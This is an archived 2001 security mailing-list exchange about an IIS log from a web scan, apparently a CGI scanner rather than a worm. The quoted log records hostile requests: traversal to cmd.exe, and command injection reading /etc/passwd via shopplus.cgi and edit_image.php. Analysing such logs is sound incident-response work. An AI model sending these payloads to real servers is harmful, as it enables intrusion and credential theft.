Just a cgiscanner. There are hundred of cgi scanners with hundreds of variants. Usually worms try multiple ways to execute commands. While there are a few there are alot of other dirs that would lead me to beleive this is just a scanner. - zenoat_private > > Mailer: SecurityFocus > > Anyone else seen this, it hit my IIS logs last night. It has some similarities to Nimda but > not identical. > -------------------------------------------------- > #Fields: date time c-ip cs-username s-sitename cs-method cs-uri-stem cs-uri-query > sc-status sc-win32-status sc-bytes cs-bytes time-taken s-port cs-version cs(User-Agent) > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD / - 400 87 138 19 47 80 > HTTP\1.0 - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /msadc/ - 404 2 143 26 15 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 16 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET > /scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir 500 87 0 98 0 > 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /bin/ - 404 2 143 24 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /samples/ - 404 2 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_cnf/ - 404 2 143 29 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/ - 404 2 143 29 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir > 404 3 604 98 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir > 404 3 604 89 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir > 404 3 604 125 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /Default.htm - 200 0 278 22 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.ida - 404 2 143 33 15 > 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.idq - 404 2 143 33 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfdocs/ - 404 2 143 27 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfide/ - 404 2 143 26 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_inf.html - 404 2 143 35 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /tsweb - 404 2 143 27 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/_vti_aut/ - 404 3 143 39 > 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp::$DATA - 404 2 604 > 39 0 80 HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp. - 404 2 604 35 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Default.htm - 200 0 278 22 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /carbo.ddl - 404 2 143 31 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /technote/ - 404 2 143 29 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-dos/ - 404 2 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/perl.exe - 404 2 143 36 0 > 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /mall_log_files/ - 404 2 143 35 0 > 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Admin_files/ - 404 2 143 32 0 > 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /quote.html - 404 2 604 31 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ikonboard/ - 404 3 143 > 38 0 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /foldoc/ - 404 2 143 27 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/adcycle/ - 404 3 143 36 > 0 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /ROADS/ - 404 2 143 26 16 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /way-board/ - 404 2 143 30 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/a1stats/ - 404 3 143 36 > 0 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /index.php > chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc 404 2 604 71 0 80 HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /scripts/shopplus.cgi > dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| 404 2 604 98 0 80 > HTTP/1.0+ - > 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /edit_image.php > dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 404 2 604 86 0 80 HTTP/1.0+ - > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Fri Nov 16 2001 - 09:03:57 PST